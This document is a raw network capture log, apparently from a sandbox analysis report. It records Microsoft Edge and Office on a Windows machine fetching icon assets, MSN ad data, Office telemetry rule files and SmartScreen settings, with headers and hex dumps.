2024-11-10 03:55:25 UTC	423	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.5	49854	13.107.246.57	443	7512	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:25 UTC	425	OUT	GET /assets/edge_hub_apps_outlook_light.png/1.9.10/asset HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-10 03:55:25 UTC	543	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:25 GMT Content-Type: image/png Content-Length: 1154 Connection: close Last-Modified: Wed, 25 Oct 2023 19:48:30 GMT ETag: 0x8DBD5935D5B3965 x-ms-request-id: d8cb9374-301e-0064-48c5-31d8a7000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241110T035525Z-17df447cdb54qlp6hC1DFWqcfc00000008cg00000000a9ap Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 69316365 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-10 03:55:25 UTC	1154	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 04 17 49 44 41 54 78 01 ed 97 cf 6f db 64 18 c7 bf 76 6a ea 34 69 e3 26 4b d4 b4 30 d2 f1 ab 4c 9a 96 c1 6e ed a1 30 0e 5c 10 4c b0 d3 0e ed 05 c1 05 35 3d ec 00 97 66 ff 41 72 43 02 a9 1a bb 70 03 c4 0d 6d 62 48 4c e2 f7 3a 0a 62 17 56 6b ab d6 aa cd 1a 37 4d 66 c7 89 fd ee 7d 9d 25 6b 1b 27 b1 1b 57 bd e4 23 39 f1 ef 7e fa 3c ef f3 bc 6f 80 1e 3d 8e 16 ce e9 8d c2 87 3f 24 4d 42 7e 04 88 04 2f e1 20 13 82 ac f9 e5 db 19 bb cb 3c 1c 62 10 73 d1 73 39 06 41 82 03 b7 80 d9 6f 6c df ed 38 82 13 5f 6f 10 b8 Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAaIDATxodvj4i&K0Ln0\L5=fArCpmbHL:bVk7Mf}%k'W#9~<o=?$MB~/ <bss9Aol8_o

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.5	49853	20.96.153.111	443	7512	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:25 UTC	999	OUT	GET /v4/api/selection?nct=1&fmt=json&nocookie=1&locale=en-us&country=US&muid=1C457A5C69C96D7328066F6F68476CEB&bcnt=1&placement=88000244&ACHANNEL=4&ABUILD=117.0.5938.132&clr=esdk&edgeid=6686581979505309747&ADEFAB=1&devosver=10.0.19045.2006&OPSYS=WIN10&poptin=0&UITHEME=light&pageConfig=547&asid=0902b7c21215417c866409a70277b594 HTTP/1.1 Host: arc.msn.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: USRLOC=; MUID=1C457A5C69C96D7328066F6F68476CEB; _EDGE_S=F=1&SID=04348CE3E2B16FF0131799D0E3856EA1; _EDGE_V=1
2024-11-10 03:55:25 UTC	777	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Length: 2673 Content-Type: application/json; charset=utf-8 Expires: Mon, 01 Jan 0001 00:00:00 GMT Server: Microsoft-IIS/10.0 ARC-RSP-DBG: [{"DcoPlusDebug":"Status: Ok"},{"RADIDS":"1,P425132513-T700344089-C128000000002113669+B+P60+S1"},{"BATCH_REDIRECT_STORE":"B128000000002113669+P0+S0"},{"OPTOUTSTATE":"256"},{"REGIONALPOLICY":"0"}] Accept-CH: UA, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform, UA-Platform-Version Access-Control-Allow-Origin: https://ntp.msn.com Access-Control-Allow-Credentials: true X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Strict-Transport-Security: max-age=31536000; includeSubDomains Date: Sun, 10 Nov 2024 03:55:25 GMT Connection: close
2024-11-10 03:55:25 UTC	2673	IN	Data Raw: 7b 22 62 61 74 63 68 72 73 70 22 3a 7b 22 76 65 72 22 3a 22 31 2e 30 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 69 74 65 6d 22 3a 22 7b 5c 22 66 5c 22 3a 5c 22 72 61 66 5c 22 2c 5c 22 76 5c 22 3a 5c 22 31 2e 30 5c 22 2c 5c 22 72 64 72 5c 22 3a 5b 7b 5c 22 63 5c 22 3a 5c 22 4d 53 4e 41 6e 61 68 65 69 6d 4e 65 77 73 4e 54 50 49 6d 61 67 65 48 6f 74 73 70 6f 74 73 5c 22 2c 5c 22 75 5c 22 3a 5c 22 4d 53 4e 41 6e 61 68 65 69 6d 4e 65 77 73 4e 54 50 49 6d 61 67 65 73 5c 22 7d 5d 2c 5c 22 61 64 5c 22 3a 7b 5c 22 74 69 74 6c 65 5c 22 3a 5c 22 48 6f 66 2c 20 49 63 65 6c 61 6e 64 5c 22 2c 5c 22 63 74 61 5c 22 3a 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 5c 2f 73 65 61 72 63 68 3f 71 3d 48 6f 66 25 32 43 2b 49 63 65 6c 61 6e 64 26 66 69 6c Data Ascii: {"batchrsp":{"ver":"1.0","items":[{"item":"{\"f\":\"raf\",\"v\":\"1.0\",\"rdr\":[{\"c\":\"MSNAnaheimNewsNTPImageHotspots\",\"u\":\"MSNAnaheimNewsNTPImages\"}],\"ad\":{\"title\":\"Hof, Iceland\",\"cta\":\"https:\/\/www.bing.com\/search?q=Hof%2C+Iceland&fil

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.5	49856	13.107.246.57	443	7512	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:25 UTC	431	OUT	GET /assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-10 03:55:25 UTC	543	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:25 GMT Content-Type: image/png Content-Length: 1468 Connection: close Last-Modified: Fri, 03 Nov 2023 21:43:14 GMT ETag: 0x8DBDCB5E23DFC43 x-ms-request-id: 24812771-e01e-006d-49cc-32c229000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241110T035525Z-17df447cdb5lrwcchC1DFWphes00000008cg00000000dtby Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L2_T2 X-Cache: TCP_REMOTE_HIT Accept-Ranges: bytes
2024-11-10 03:55:25 UTC	1468	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 05 51 49 44 41 54 78 01 ed 97 4b 6c 54 55 18 c7 ff e7 4e 19 62 da e0 b0 a1 01 03 5c 82 51 7c 52 16 1a 6d 6b 42 57 c4 c7 c2 2e 8c 26 24 46 62 44 17 26 b4 04 62 5c a0 ad 1a 63 dc c8 82 85 89 26 b4 09 68 89 1a a7 18 79 24 1a c6 05 75 41 02 17 19 23 46 03 13 10 4a 35 c8 50 fa 9a b9 f7 9c cf ef 3c ee 74 a6 96 76 da a6 2b e6 4b 4f ef cc b9 e7 9e ef 77 ff df e3 de 01 6a 56 b3 9a d5 ec ce 36 81 45 b6 cd 67 28 85 89 89 14 22 f8 20 e9 4b 0f 29 41 22 25 3c ac 85 42 8a a4 f2 a9 a8 52 8d e1 c5 d4 d5 70 75 3e 49 de a6 Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAaQIDATxKlTUNb\Q\|RmkBW.&$FbD&b\c&hy$uA#FJ5P<tv+KOwjV6Eg(" K)A"%<BRpu>I

Session ID	Source IP	Source Port	Destination IP	Destination Port
78	192.168.2.5	49857	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:25 UTC	192	OUT	GET /rules/rule120640v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:25 UTC	491	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:25 GMT Content-Type: text/xml Content-Length: 478 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT ETag: "0x8DC582B9B233827" x-ms-request-id: e7016861-001e-000b-65af-3115a7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035525Z-17df447cdb5wrr5fhC1DFWte8n00000008rg000000008ysd x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-10 03:55:25 UTC	478	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
79	192.168.2.5	49858	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:25 UTC	192	OUT	GET /rules/rule120641v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:25 UTC	491	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:25 GMT Content-Type: text/xml Content-Length: 404 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT ETag: "0x8DC582B95C61A3C" x-ms-request-id: db719d09-901e-005b-33cb-322005000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035525Z-16547b76f7fcjqqhhC1DFWrrrc0000000c2g00000000bbnv x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-10 03:55:25 UTC	404	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S

Session ID	Source IP	Source Port	Destination IP	Destination Port
80	192.168.2.5	49859	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:25 UTC	192	OUT	GET /rules/rule120642v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-10 03:55:25 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:25 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT ETag: "0x8DC582BB046B576" x-ms-request-id: 7b5801bf-001e-0082-0c6f-315880000000 x-ms-version: 2018-03-28 x-azure-ref: 20241110T035525Z-15869dbbcc6lq45jhC1DFWbkc800000005xg000000005mns x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-10 03:55:25 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.5	49861	13.91.96.185	443	7512	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-10 03:55:25 UTC	698	OUT	POST /api/browser/edge/data/settings/3 HTTP/1.1 Host: data-edge.smartscreen.microsoft.com Connection: keep-alive Content-Length: 718 Accept: application/octet-stream;application/x-patch-bsdiff; Authorization: SmartScreenHash eyJhdXRoSWQiOiI0MWE0MzhiYy0xMjQ5LTQzZDMtYTI2ZC02OWNkNjJjMDgzMTciLCAia2V5IjoiSnlBN1laUTI1NkhtSm5rMWVDK1hGQT09IiwgImhhc2giOiJRL2lnVUZ6QlJKST0ifQ== Content-Type: application/json; charset=utf-8 If-None-Match: "2.0-0" Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br
2024-11-10 03:55:25 UTC	718	OUT	Data Raw: 7b 22 69 64 65 6e 74 69 74 79 22 3a 7b 22 75 73 65 72 22 3a 7b 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 47 42 22 7d 2c 22 64 65 76 69 63 65 22 3a 7b 22 69 64 22 3a 6e 75 6c 6c 2c 22 63 75 73 74 6f 6d 49 64 22 3a 6e 75 6c 6c 2c 22 6f 6e 6c 69 6e 65 49 64 54 69 63 6b 65 74 22 3a 6e 75 6c 6c 2c 22 66 61 6d 69 6c 79 22 3a 33 2c 22 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 47 42 22 2c 22 6f 73 56 65 72 73 69 6f 6e 22 3a 22 31 30 2e 30 2e 31 39 30 34 35 2e 32 30 30 36 2e 76 62 5f 72 65 6c 65 61 73 65 22 2c 22 62 72 6f 77 73 65 72 22 3a 7b 22 69 6e 74 65 72 6e 65 74 5f 65 78 70 6c 6f 72 65 72 22 3a 22 39 2e 31 31 2e 31 39 30 34 31 2e 30 22 7d 2c 22 6e 65 74 4a 6f 69 6e 53 74 61 74 75 73 22 3a 32 2c 22 65 6e 74 65 72 70 72 69 73 65 22 3a 7b 7d 2c 22 63 6c 6f 75 64 53 6b Data Ascii: {"identity":{"user":{"locale":"en-GB"},"device":{"id":null,"customId":null,"onlineIdTicket":null,"family":3,"locale":"en-GB","osVersion":"10.0.19045.2006.vb_release","browser":{"internet_explorer":"9.11.19041.0"},"netJoinStatus":2,"enterprise":{},"cloudSk
2024-11-10 03:55:26 UTC	302	IN	HTTP/1.1 200 OK Date: Sun, 10 Nov 2024 03:55:25 GMT Content-Type: application/octet-stream Content-Length: 130439 Connection: close Server: Kestrel ETag: "2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1" Request-Context: appId=cid-v1:3d5e3eff-de07-43c3-a15d-06b05ff513c8
2024-11-10 03:55:26 UTC	16082	IN	Data Raw: 7b 0d 0a 20 20 22 67 65 6f 69 64 4d 61 70 73 22 3a 20 7b 0d 0a 20 20 20 20 22 61 75 22 3a 20 22 68 74 74 70 73 3a 2f 2f 61 75 73 74 72 61 6c 69 61 2e 73 6d 61 72 74 73 63 72 65 65 6e 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 22 2c 0d 0a 20 20 20 20 22 63 68 22 3a 20 22 68 74 74 70 73 3a 2f 2f 73 77 69 74 7a 65 72 6c 61 6e 64 2e 73 6d 61 72 74 73 63 72 65 65 6e 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 22 2c 0d 0a 20 20 20 20 22 65 75 22 3a 20 22 68 74 74 70 73 3a 2f 2f 65 75 72 6f 70 65 2e 73 6d 61 72 74 73 63 72 65 65 6e 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 22 2c 0d 0a 20 20 20 20 22 66 66 6c 34 22 3a 20 22 68 74 74 70 73 3a 2f 2f 75 6e 69 74 65 64 73 74 61 74 65 73 31 2e 73 73 2e 77 64 2e 6d 69 63 72 6f 73 6f 66 74 2e 75 73 2f 22 2c 0d 0a Data Ascii: { "geoidMaps": { "au": "https://australia.smartscreen.microsoft.com/", "ch": "https://switzerland.smartscreen.microsoft.com/", "eu": "https://europe.smartscreen.microsoft.com/", "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",
2024-11-10 03:55:26 UTC	16384	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 30 39 63 34 37 36 32 37 62 63 35 33 33 62 35 39 32 34 61 30 35 35 61 30 34 62 63 34 63 33 33 65 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 39 2e 35 38 33 34 34 30 31 37 37 34 34 37 38 34 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 65 36 33 34 65 62 32 30 64 62 35 30 38 65 33 61 33 31 62 36 31 34 38 31 61 32 35 31 62 66 39 33 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 2d 30 2e 33 33 37 30 36 38 35 39 32 37 38 32 37 33 35 0d 0a 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: { "key": "09c47627bc533b5924a055a04bc4c33e", "value": 9.58344017744784 }, { "key": "e634eb20db508e3a31b61481a251bf93", "value": -0.337068592782735
2024-11-10 03:55:26 UTC	16384	IN	Data Raw: 30 37 37 37 34 37 33 33 30 39 35 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 31 32 62 62 65 66 63 30 35 64 35 31 34 32 65 37 65 62 36 38 36 66 61 64 38 64 65 61 39 32 31 31 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 2d 31 2e 30 35 37 31 37 37 35 33 31 31 38 30 39 34 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 63 65 35 66 62 38 64 66 31 32 35 61 34 37 32 31 64 31 64 66 33 32 38 62 63 36 66 32 64 64 65 61 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a Data Ascii: 07774733095 }, { "key": "12bbefc05d5142e7eb686fad8dea9211", "value": -1.05717753118094 }, { "key": "ce5fb8df125a4721d1df328bc6f2ddea", "value":
2024-11-10 03:55:26 UTC	16384	IN	Data Raw: 20 2d 31 2e 39 30 31 33 34 36 37 39 37 33 36 34 32 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 66 32 33 35 64 63 66 36 62 34 32 39 62 61 34 31 36 64 63 65 37 34 64 34 62 36 66 62 63 34 37 62 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 31 2e 32 36 30 31 38 31 31 38 35 36 30 38 38 34 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 63 38 66 31 37 64 37 34 30 33 61 63 35 66 66 32 38 39 36 61 37 31 33 61 37 31 37 35 65 64 31 39 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 Data Ascii: -1.9013467973642 }, { "key": "f235dcf6b429ba416dce74d4b6fbc47b", "value": 1.26018118560884 }, { "key": "c8f17d7403ac5ff2896a713a7175ed19", "va
2024-11-10 03:55:26 UTC	16384	IN	Data Raw: 36 62 64 32 65 65 33 36 63 30 33 66 36 66 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 35 2e 38 35 39 38 36 34 33 39 33 34 36 35 37 36 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 65 66 64 32 61 66 36 30 63 38 35 30 31 39 33 31 63 62 39 63 37 33 36 62 35 61 64 37 34 66 36 35 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 33 2e 39 35 36 39 39 35 33 35 33 36 34 30 30 33 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 32 63 38 34 38 35 34 38 64 34 36 30 63 Data Ascii: 6bd2ee36c03f6f", "value": 5.85986439346576 }, { "key": "efd2af60c8501931cb9c736b5ad74f65", "value": 3.95699535364003 }, { "key": "2c848548d460c
2024-11-10 03:55:26 UTC	16384	IN	Data Raw: 20 22 6b 65 79 22 3a 20 22 65 31 36 38 36 30 37 38 64 31 62 36 30 64 33 35 31 64 61 35 61 38 37 35 34 33 61 32 61 36 36 33 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 37 2e 35 30 36 36 35 35 32 34 32 36 32 35 35 31 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 79 22 3a 20 22 33 61 33 34 31 37 66 35 66 32 30 61 30 33 61 39 38 39 37 33 36 38 39 38 38 37 66 62 37 32 61 32 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 76 61 6c 75 65 22 3a 20 2d 31 2e 37 34 39 32 32 35 31 37 36 34 32 37 39 34 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 0d 0a 20 20 20 20 20 20 20 Data Ascii: "key": 